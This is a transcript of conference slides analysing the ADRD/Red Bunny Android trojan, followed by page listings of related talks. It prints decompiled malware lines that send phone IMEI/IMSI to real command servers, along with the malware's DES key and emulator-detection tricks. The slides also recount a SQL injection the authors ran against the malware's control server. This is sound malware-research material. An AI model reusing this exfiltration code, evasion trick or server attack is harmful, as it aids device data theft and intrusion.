SlideShare a Scribd company logo

Wtf is happening_inside_my_android_phone_public

Jaime Blasco
Jaime Blasco
1 of 32
Download to read offline
! Lost in translation WTF is happening inside my Android Phone Ok Cancel
8:30 PM Contents Contents Android System Static Analysis Dynamic Analysis Reversing Red Bunny Conclusion Cancel
8:30 PM Android architecture
8:30 PM DALVIK VM - Register-based virtual machine - It uses its own bytecode, not Java bytecode. - Run on a slow CPU with little RAM. - Run on an operating system without swap space. - Optimized for memory efficiency. - Dex class file format.
8:30 PM Dex file format header string_ids type_ids proto_ids field_ids method_ids class_defs data
8:30 PM Analysis Environment Tools Case-sensitive file system :D Android SDK Android NDK Android source code Eclipse Apktool, Dex2jar, JD-GUI Android Emulator
8:30 PM Example .java/jd-gui Compiler dex2jar .java/source .dex/dexdump .smali/baskmali baskmali
8:30 PM Anti-analysis Examples: - Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems. - Medium: Optimize/ofuscate the code with ProGuard. - Hard: Modify bytecode to break reversing tools (be sure that it still runs on Dalvik.) if self.__value_type >= VALUE_SHORT Ej: androguard-a1: ... elif self.__value_type == VALUE_ARRAY : ... elif self.__value_type == VALUE_BYTE : Insert value type ... VALUE_ANNOTATION elif self.__value_type == VALUE_NULL : ... elif self.__value_type == VALUE_BOOLEAN : ... else : raise(“oops”)
8:30 PM Dynamic Analysis Basic: - Create an Android Virtual Device. -> $android (SDK) - $emulator -port 5560 @virtual-device -tcpdump capture.pcap - $adb install app.apk - $adb shell monkey -v -p package.app 700 - $adb shell logcat -d && $adb shell logcat -b events -d (radio also) - $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
8:30 PM Make it more real - Simulate phone events: Send SMS: echo sms send +34656566789 test | nc localhost 5554 D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c Simulate calls: $echo gsm call +34656566789 |nc localhost 5554 $echo gsm accept +34656566789 |nc localhost 5554 $echo gsm cancel +34656566789 |nc localhost 5554 Change GPS coordinates: $echo geo fix -82.411629 28.054553|nc localhost 5554
8:30 PM Dynamic Analysis Advance: - Create you own system image and modify the java classes to log the program flow. Example, framework/base/core/java/android/os/ Process.java
8:30 PM Compiling Android Kernel modules $git clone git://android.git.kernel.org/kernel/common $git branch -a $git checkout --track -b android-goldfish-2.6.29 origin/android- goldfish-2.6.29 $adb pull /proc/config.gz ./;gunzip config.gz; mv config .config Edit and Add CONFIG_MODULES=y (disable by default on emulator kernel) $emulator -avd armv5y -kernel /tmp/zImage
8:30 PM System-Call Hooking $grep sys_call_table System.map
8:30 PM Anti-VM - Detecting the emulator is very easy: DEVICE_ID: String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID); boolean emulator = TextUtils.isEmpty(id); Solution: Change secure->android_id on data/data/com.android.providers.settings/databases/settings.db IMSI: TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE); String imsi = manager.getSubscriberId(); (00000... on emulator) Solution: Patch the emulator binary (search for +CGSN string) or the emulator source code (external/ qemu/telephony/android_modem.c).
8:30 PM More Anti-VM - LocationManager.NETWORK_PROVIDER -> IllegalArgumentException - Detect ADB stuff.. process, network, debug enabled... - /proc/cpuinfo - > Hardware : Goldfish - vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t change) (Thanks Ehooo) - Qemu specific detection (Google) Solution: Patch emulator, Qemu, system hooking...
8:30 PM Alternatives to Android Emulator - http://www.android-x86.org/ . Supports VMware - Use a real phone... Slower
8:30 PM Attack Vectors - Alternative markets, repacked applications. -SMS, MMS vulnerabilities, Fuzzing!!!. - Wireless, Bluetooth Drivers - NFC - System componentes: Webkit, sound library, Kernel.
8:30 PM Third party software Source: http://android.git.kernel.org/
8:30 PM ADRD aka Redbunny - "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" ( http://blog.aegislab.com/index.php? op=ViewArticle&articleId=75&blogId=1 ) ! Notification - "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]" - Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011: * Name: com.beautyfullivewallpaper * Date: Feb. 2, 2011, 1:49 p.m. - Also known as HongTouTou
8:30 PM Detection - Permission list:  * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS.. - Cipher module/library calls (DES):  * init        Ljavax/crypto/Cipher;    Lcom/xxx/yyy/ddda;    decrypt - Function calls to retrieve the IMSI/IMEI codes:  * IMEI:    getDeviceId       Lcom/xxx/yyy/MyService;    onCreate  * IMSI:    getSubscriberId     Lcom/xxx/yyy/MyService;    onCreate - HTTP Requests (GET and POST):  * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject;  * adrd.xiaxiab.com     POST    /index.aspx? im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace 3ed65910991f4dbd438af
8:30 PM Detection - Sends http requests through a proxy:  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default- proxy", localHttpHost); - Services:  * com.xxx.yyy.MyService  * .beauty.Beauty - Intents:  * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup  * android.intent.action.PHONE_STATE  * android.net.conn.CONNECTIVITY_CHANGE
8:30 PM Analysis I Service module (MyService): Sets a Proxy for GET/POST and - Sets the preferred apn 1 HTTP specially crafted headers - Runs each 12 hours (UA, MIME types) - Looks for specific APN network : 2 “CMWAP” || “UNIWAP” Cipher data module Send data to adrd.taxuan.net/ public static String encrypt/decrypt 3 index.aspx?im=%s: Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding"); + IMEI + IMSI Loop + Netway (preferred APN) + Decrypt response + iversion + Switch(cmd) It depends on the + oversion 4 + 0 Do nothing + 1 adad.StartGo() adad.StartGo() + 2 ParseO 5 Sends http://adrd.xiaxiab.com/pic.aspx?im= + 3 UpdateHelper() +encrypt(IMEI+IMSI Parses the big list of ulrs/referers B#1#963a_w1|http://59.173.12.105/g/ UpdateHelper installs the update g.ashx?w=963a_w1 apk 6 BBBB.Go() -> Retrieves search lists of wap.baidu.com FixUrls(): Send random requests adding BAIDU_WISE_UID and HTTP_HEADERS. ParseO(): parse server response (number, flags, tags..): Sends log data to control servers 6 T213607170863|12345|+ -10086+ abc -597| [ ' 6
8:30 PM Analysis II - Following the encryption routines, the DES key is found…: this.kk = "48734154"; * UpdateHelper class: public class UpdateHelper { private static String savefilepath = "/myupdate.apk"; private Context ct; private int netway; * Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges. - Server URLs (there are more): http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA - We want to know more!!
8:30 PM Control Servers - adrd.xiaxiab.com from an eagle view: * Microsoft-IIS/6.0 * Debug Enabled (Displaying .NET errors and backtraces) * Hidden paths to the .Net/aspx application * ALL is Chinese! (WTF!?!"·$%&/(?) - Possible vector attacks: * HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
8:30 PM Control Servers - First results: Search * Exceptions in chinese. Google Translate is your friend * Errors at .NET (it didn't generate any html list/table, or view to use for data displaying) * We got a successful Sql injection after the last ciphered parameter :D). * User without admin privileges. * Permissions to run Backups + Shared Resources = Timeout * Other possibilities: + 1: Create a temporal db, with just one table each time, dump paginated rows and run backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang didn't help) + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for performance reason.
8:30 PM Database Information - All the scheme obtained: list of Tables, Fields, types, stored procedures - IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts - The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that points to adrd.xiaxiab.com/down.aspx ! * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int * Store procedure: --if (@netwap=2) select 'T-1|T11' --select 'T3http://adrd.xiaxiab.com/down.aspx' --select 'T213607170863|12345|+ -10086+ abc -597| [ ' --else --select 'T013607170863' * Looks that they were considering the netwap (based on the mobile operator) as a criteria to send commands * TX (where X seems to be a command type) * 13607170863 is a phone number located at Wuhan
8:30 PM Database Scheme t_baiduHourPercent: autoid, mHour, mPercent t_ : myear, mmonth, mday, mhour, total t_baidukeyword: keyword, viewcount t_ : way, flag t_baidukeywordflash: keyword t_baiduOrtherKey: keyword, viewcount t_ : keyword, flag t_baidupwd: id, way, username, pwd t_ _wap: keyword, flag t_baiduwayname: way, wayname t_ _wap_back : keyword, flag t_keywordResult: id, keyword, link, head, flag t_androidtemplog: id, imsi, way, result, createtime t_ _wap_back : keyword, flag t_keywordResult20100601: id, keyword, link, head, flag t_ : flag t_keywordResult20101108: id, keyword, link, head, flag t_ : keyword, createtime t_baiduHourPercent20101012: autoid, mHour, mPercent t_androidtemplog_backup: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_androidtemperrlog: id, compresslog, decompresslog, createtime t_ : keyword, createtime t_androidtemplog_backup201101: id, imsi, way, result, createtime t_ _wap: keyword, createtime t_android : id, imei, imsi, logs, ip, createtime, netway t_android : , , , , createtime t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, userid t_ : way, maxClick, minClick, leaveTotalClick, leaveEffectClick t_ _wap_20100323: keyword, createtime t_ _wap_20100722 : keyword, createtime
8:30 PM Myupdate.apk - It uses the main package of the ADRD family xxx.yyy. - The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS.. - Looks like a google reader - It adds a local sqlite DB (keyword storage). go_g1_sms: id, keyword, type, flag go_g2_sms: id, keyword, keyword2 - SMSObserver: * Replaces keywords on SMS’s. * Sends SMS!
8:30 PM Samples Package name Md5 Adrd Ver IVer com.beautyfullivewallpaper 4556a687a2845bf4dfac62c594938cf3 adrd.zt.cw.1 6 com.yodesoft.yohandcar 6783cee889fa64df68af58a56ff6e362 adrd.zt.2 6 com.binaryloft.live.winter aa5216da617839e818d83d8185da42b0 adrd.zt.jtj.2 6 com.magicwach.rdefense 839c37f3a2c8d31561d28f619a2a712e adrd.zt.cw.3 6 com.tat.livewallpaper.dandelion 5192ad05597e7a148f642be43f6441f6 adrd.zt.cw.4 6 com.classicnerds.livewallpaper.HK b72724d8fc0f633194dcc3bd28eec026 adrd.zt.cw.5 7 fishnoodle.night_city a01ba26a34e55f71873782348ff5e074 adrd.zt.dxm.6 7 com.appspot.swisscodemonkeys.steam cdfca19bf212adf3292e4fe677fe46a6 adrd.zt.cw.7 7 kr.mobilesoft.yxplayer e3cc6c7af0d83fe322116254c01cf720 adrd.zt.cw.8 7 com.labgency.wallpapers.waves 7d764347a0b0c9d11160d7a7684bf02b adrd.zt.dxm.8 7 com.laucass.andromax 627f41c8f8e7ab007641c4a0c1d8ce1b adrd.zt.cw.9 7 com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 drd.zt.cw.12 7 proscio.wallpaper.shamroc e09782d35d72a769dc7454adb6d8e2e9 adrd.zt.cw.15 7  com.tt.yy f2596f8f3c52381318f62d1ab161c284 ?? ??
8:30 PM Infections g Geolocation
8:30 PM Infections g Infections by operator +20K different IMSIs Other affected operators: Far EasT one Peoples Telephone Company Hutchison 3G PCCW Mobile Sunday Hong Kong Telecom Smart One Mobile
8:30 PM Thank You ! Questions? Ok Cancel @jaimeblascob @PabloForThePPL

Recommended

Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Freddy Ortiz
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureKaspersky
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian MalwareKaspersky
 
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCasey Ellis
 
Fortify dev ops (002)
Fortify dev ops (002)Fortify dev ops (002)
Fortify dev ops (002)Madhavan Marimuthu
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
Cyber Security and Open Source
Cyber Security and Open SourceCyber Security and Open Source
Cyber Security and Open SourcePOSSCON
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 

Recommended

Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Freddy Ortiz
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureKaspersky
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian MalwareKaspersky
 
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCasey Ellis
 
Fortify dev ops (002)
Fortify dev ops (002)Fortify dev ops (002)
Fortify dev ops (002)Madhavan Marimuthu
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
Cyber Security and Open Source
Cyber Security and Open SourceCyber Security and Open Source
Cyber Security and Open SourcePOSSCON
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
OWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsInternet Security Auditors
 
THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt ScannerFlorian Roth
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedPriyanka Aash
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
 
Finding Triggered Malice in Android Apps
Finding Triggered Malice in Android AppsFinding Triggered Malice in Android Apps
Finding Triggered Malice in Android AppsPriyanka Aash
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android BotPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareChelsea Sisson
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion TechniquesThomas Roccia
 
Michelle K Webster: Malware - Cryptolocker Research Final
Michelle K Webster: Malware - Cryptolocker Research FinalMichelle K Webster: Malware - Cryptolocker Research Final
Michelle K Webster: Malware - Cryptolocker Research FinalM.K. Webster
 
Hunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezHunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezEC-Council
 
Tracking vulnerable JARs
Tracking vulnerable JARsTracking vulnerable JARs
Tracking vulnerable JARsDavid Jorm
 
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP
 
[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101OWASP
 
Android Malware Analysis
Android Malware AnalysisAndroid Malware Analysis
Android Malware AnalysisJongWon Kim
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersPriyanka Aash
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode reviewAnant Shrivastava
 
Malware analysis
Malware analysisMalware analysis
Malware analysisxabean
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVThomas Roccia
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approachAntonio Parata
 
Volantino Limoni Profumerie e Linea Bellezza della Sardegna
Volantino Limoni Profumerie e Linea Bellezza della SardegnaVolantino Limoni Profumerie e Linea Bellezza della Sardegna
Volantino Limoni Profumerie e Linea Bellezza della SardegnaLimoni Profumerie
 
Making creative use of the NHS estate
Making creative use of the NHS estateMaking creative use of the NHS estate
Making creative use of the NHS estateStan Grenier
 

More Related Content

What's hot

OWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsInternet Security Auditors
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedPriyanka Aash
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
 
Finding Triggered Malice in Android Apps
Finding Triggered Malice in Android AppsFinding Triggered Malice in Android Apps
Finding Triggered Malice in Android AppsPriyanka Aash
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android BotPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareChelsea Sisson
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion TechniquesThomas Roccia
 
Michelle K Webster: Malware - Cryptolocker Research Final
Michelle K Webster: Malware - Cryptolocker Research FinalMichelle K Webster: Malware - Cryptolocker Research Final
Michelle K Webster: Malware - Cryptolocker Research FinalM.K. Webster
 
Hunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezHunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezEC-Council
 
Tracking vulnerable JARs
Tracking vulnerable JARsTracking vulnerable JARs
Tracking vulnerable JARsDavid Jorm
 
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP
 
[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101OWASP
 
Android Malware Analysis
Android Malware AnalysisAndroid Malware Analysis
Android Malware AnalysisJongWon Kim
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersPriyanka Aash
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode reviewAnant Shrivastava
 
Malware analysis
Malware analysisMalware analysis
Malware analysisxabean
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVThomas Roccia
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approachAntonio Parata
 

What's hot (20)

OWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application AssessmentsOWASP Europe Summit Portugal 2008. Web Application Assessments
OWASP Europe Summit Portugal 2008. Web Application Assessments
 
THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt Scanner
 
Android Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities RevisitedAndroid Serialization Vulnerabilities Revisited
Android Serialization Vulnerabilities Revisited
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
 
Finding Triggered Malice in Android Apps
Finding Triggered Malice in Android AppsFinding Triggered Malice in Android Apps
Finding Triggered Malice in Android Apps
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless Malware
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion Techniques
 
Michelle K Webster: Malware - Cryptolocker Research Final
Michelle K Webster: Malware - Cryptolocker Research FinalMichelle K Webster: Malware - Cryptolocker Research Final
Michelle K Webster: Malware - Cryptolocker Research Final
 
Hunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezHunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul Alvarez
 
Tracking vulnerable JARs
Tracking vulnerable JARsTracking vulnerable JARs
Tracking vulnerable JARs
 
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-miningOWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
OWASP Poland Day 2018 - Amir Shladovsky - Crypto-mining
 
[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101
 
Android Malware Analysis
Android Malware AnalysisAndroid Malware Analysis
Android Malware Analysis
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode review
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approach
 

Viewers also liked

Volantino Limoni Profumerie e Linea Bellezza della Sardegna
Volantino Limoni Profumerie e Linea Bellezza della SardegnaVolantino Limoni Profumerie e Linea Bellezza della Sardegna
Volantino Limoni Profumerie e Linea Bellezza della SardegnaLimoni Profumerie
 
Making creative use of the NHS estate
Making creative use of the NHS estateMaking creative use of the NHS estate
Making creative use of the NHS estateStan Grenier
 
Mexican food
Mexican foodMexican food
Mexican foodAlonso Jm
 
πρακτικη ασκηση οτεκ 2011
πρακτικη ασκηση οτεκ 2011πρακτικη ασκηση οτεκ 2011
πρακτικη ασκηση οτεκ 2011Iraklis Kavouklis
 
Verklarende evaluatie ronde tafel
Verklarende evaluatie ronde tafelVerklarende evaluatie ronde tafel
Verklarende evaluatie ronde tafelHenk Sligte
 
Rgp Business Brochure
Rgp Business BrochureRgp Business Brochure
Rgp Business Brochurergp_site
 
Carnaval 2011
Carnaval 2011Carnaval 2011
Carnaval 2011FBIRF1
 
Interaction design
Interaction designInteraction design
Interaction designfeifei2011
 
Vinteraktivitetsbok
VinteraktivitetsbokVinteraktivitetsbok
Vinteraktivitetsbokelislund
 
Trade edge oe's trade finance product
Trade edge oe's trade finance productTrade edge oe's trade finance product
Trade edge oe's trade finance productobjectedge
 
Sconti Mai Visti dal 24 febbraio al 13 marzo
Sconti Mai Visti dal 24 febbraio al 13 marzoSconti Mai Visti dal 24 febbraio al 13 marzo
Sconti Mai Visti dal 24 febbraio al 13 marzoLimoni Profumerie
 
Offerte Card Festa della Mamma
Offerte Card Festa della MammaOfferte Card Festa della Mamma
Offerte Card Festa della MammaLimoni Profumerie
 
Social media slide share
Social media slide shareSocial media slide share
Social media slide shareEvhen Farmiga
 
Leitura
LeituraLeitura
LeituraFBIRF1
 
MMT Dubai presentation by Mr. Deepak Chandnani, CEO, Obopay
MMT Dubai presentation by Mr. Deepak Chandnani, CEO, ObopayMMT Dubai presentation by Mr. Deepak Chandnani, CEO, Obopay
MMT Dubai presentation by Mr. Deepak Chandnani, CEO, ObopayObopay
 
Presentatie vraagfinanciering schoolbegeleiding
Presentatie vraagfinanciering schoolbegeleidingPresentatie vraagfinanciering schoolbegeleiding
Presentatie vraagfinanciering schoolbegeleidingHenk Sligte
 

Viewers also liked (19)

Volantino Limoni Profumerie e Linea Bellezza della Sardegna
Volantino Limoni Profumerie e Linea Bellezza della SardegnaVolantino Limoni Profumerie e Linea Bellezza della Sardegna
Volantino Limoni Profumerie e Linea Bellezza della Sardegna
 
Making creative use of the NHS estate
Making creative use of the NHS estateMaking creative use of the NHS estate
Making creative use of the NHS estate
 
Ee eee
Ee eeeEe eee
Ee eee
 
Mexican food
Mexican foodMexican food
Mexican food
 
πρακτικη ασκηση οτεκ 2011
πρακτικη ασκηση οτεκ 2011πρακτικη ασκηση οτεκ 2011
πρακτικη ασκηση οτεκ 2011
 
Verklarende evaluatie ronde tafel
Verklarende evaluatie ronde tafelVerklarende evaluatie ronde tafel
Verklarende evaluatie ronde tafel
 
Rgp Business Brochure
Rgp Business BrochureRgp Business Brochure
Rgp Business Brochure
 
Carnaval 2011
Carnaval 2011Carnaval 2011
Carnaval 2011
 
Interaction design
Interaction designInteraction design
Interaction design
 
Vinteraktivitetsbok
VinteraktivitetsbokVinteraktivitetsbok
Vinteraktivitetsbok
 
Trade edge oe's trade finance product
Trade edge oe's trade finance productTrade edge oe's trade finance product
Trade edge oe's trade finance product
 
Esp2011opening
Esp2011openingEsp2011opening
Esp2011opening
 
Sconti Mai Visti dal 24 febbraio al 13 marzo
Sconti Mai Visti dal 24 febbraio al 13 marzoSconti Mai Visti dal 24 febbraio al 13 marzo
Sconti Mai Visti dal 24 febbraio al 13 marzo
 
Offerte Card Festa della Mamma
Offerte Card Festa della MammaOfferte Card Festa della Mamma
Offerte Card Festa della Mamma
 
Social media slide share
Social media slide shareSocial media slide share
Social media slide share
 
Leitura
LeituraLeitura
Leitura
 
MMT Dubai presentation by Mr. Deepak Chandnani, CEO, Obopay
MMT Dubai presentation by Mr. Deepak Chandnani, CEO, ObopayMMT Dubai presentation by Mr. Deepak Chandnani, CEO, Obopay
MMT Dubai presentation by Mr. Deepak Chandnani, CEO, Obopay
 
Presentatie vraagfinanciering schoolbegeleiding
Presentatie vraagfinanciering schoolbegeleidingPresentatie vraagfinanciering schoolbegeleiding
Presentatie vraagfinanciering schoolbegeleiding
 
Problemas de programacion
Problemas de programacionProblemas de programacion
Problemas de programacion
 

Similar to Wtf is happening_inside_my_android_phone_public

Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
IstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisIstSec'14 - İbrahim BALİÇ - Automated Malware Analysis
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
 
Automated malware analysis
Automated malware analysisAutomated malware analysis
Automated malware analysisIbrahim Baliç
 
Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Codemotion
 
Ato2019 weave-services-istio
Ato2019 weave-services-istioAto2019 weave-services-istio
Ato2019 weave-services-istioLin Sun
 
Weave Your Microservices with Istio
Weave Your Microservices with IstioWeave Your Microservices with Istio
Weave Your Microservices with IstioAll Things Open
